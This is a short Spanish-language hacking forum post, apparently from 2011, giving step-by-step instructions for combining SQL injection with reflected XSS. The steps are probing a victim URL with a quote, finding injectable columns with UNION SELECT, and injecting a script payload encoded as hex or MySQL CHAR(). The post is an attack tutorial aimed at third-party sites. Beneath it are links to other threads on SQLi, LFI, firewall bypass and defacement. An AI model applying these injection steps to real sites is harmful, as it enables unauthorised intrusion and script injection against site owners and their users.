XSS no persistente con SQLi

« **en:** Agosto 25, 2011, 12:08:40 am »

Para hacer una inyeccion XSS no persistente a travez de una inyeccion SQL hay que hacer lo siguiente:

Encontramos un sitio vulnerable

www.victima.com/index.php?id=1'

Luego hacemos un UNION con la cantidad de columnas (Ej: 6)

www.victima.com/index.php?id=1 UNION SELECT 1,2,3,4,5,6--

Ahi aparecen las columnas vulnerables, entonces es cuando inyectamos nuestro codigo

El original es

<script>alert("XSS");</script>

Pero hay que encodearlo en HEX o usar la funcion CHAR de MySQL

HEX ENCODED:

0x3c7363726970743e616c657274282258535322293b3c2f7363726970743e

MySQL CHAR:

CHAR(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62)

Espero que les haya gustado!

SQLI tutorial pour débutants ( newbie) ecrite par ..::Key-m0rt::.. Iniciado por ..::key-m0rt::..	Respuestas: 0 Vistas: 1813	Marzo 23, 2010, 12:38:21 pm por ..::key-m0rt::..
LFI+SQLI [Incluyendo ficheros a travez de valores enteros] Iniciado por q3rv0	Respuestas: 4 Vistas: 1855	Julio 24, 2013, 01:43:36 pm por M5f3r0
[Video] Jugando al JuAckEr pt 1. [No es tutorial][SQLi+Deface] Iniciado por Xt3mP	Respuestas: 0 Vistas: 1640	Julio 21, 2010, 07:43:44 pm por Xt3mP
SQLi bypaseando el firewall y pasando el examen! Iniciado por arthusu	Respuestas: 5 Vistas: 2590	Junio 07, 2013, 10:12:11 pm por morodog
Exploit Career jobs wordpress[SQLi] Iniciado por OswireW0rding	Respuestas: 1 Vistas: 2057	Marzo 12, 2014, 10:39:40 pm por .:UND3R:.

Esta es una respuesta al tema: XSS no persistente con SQLi en La plantilla. Bugs y Exploits

XSS no persistente con SQLi

Abnormality

XSS no persistente con SQLi

Similar topics (5)